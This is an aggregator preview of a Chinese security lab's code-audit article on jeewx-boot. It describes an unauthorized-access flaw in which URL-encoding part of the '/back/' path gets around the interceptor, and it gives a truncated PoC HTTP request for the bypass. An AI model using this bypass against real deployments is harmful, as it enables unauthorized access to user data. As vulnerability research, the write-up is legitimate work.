专栏名称: 宸极实验室

『宸极实验室』隶属山东九州信泰信息科技股份有限公司，是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。实验室圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动，并积极参加各类网络安全竞赛，屡获殊荣。

我也要提交微信公众号

今天看啥

公众号rss, 微信rss, 微信公众号rss订阅, 稳定的RSS源

微信公众号RSS订阅方法

B站投稿RSS订阅方法

雪球动态RSS订阅方法

微博RSS订阅方法

微博搜索关键词RSS订阅方法

知网期刊RSS订阅方法

即刻RSS订阅方法

『代码审计』jeewx-boot 代码审计

宸极实验室 · 公众号 · · 2024-08-12 17:00

文章预览

点击蓝字关注我们日期：2024年08月12日作者：ICDAT 介绍：这篇文章主要是对jeewx-boot进行代码审计。 0x00 前言在最近的挖洞过程中，遇到了一个 jeewx-boot ，发现其在 github 上有源码，就对该项目进行了代码审计。 0x01 未授权访问漏洞这个项目 base-system 是主要的模块， JeewxBootApplication 是启动类。查看 interceptors 的拦截器。这里只是对用户请求的访问地址是否存在 /back/ 进行判断，根据之前的学习，在 spring mvc 的全版本中存在 url 编码的方式进行绕过。 web 验证：对 c 进行 url 编码后，成功未授权。 poc ： GET /jeewx/system/ba%63k/jwSystemUser/list.do HTTP/1.1 Host : 10.27.2.192 Pragma : no-cache Cache-Control : no-cache Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,applicat ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览
推荐产品: 推荐产品

分享到微博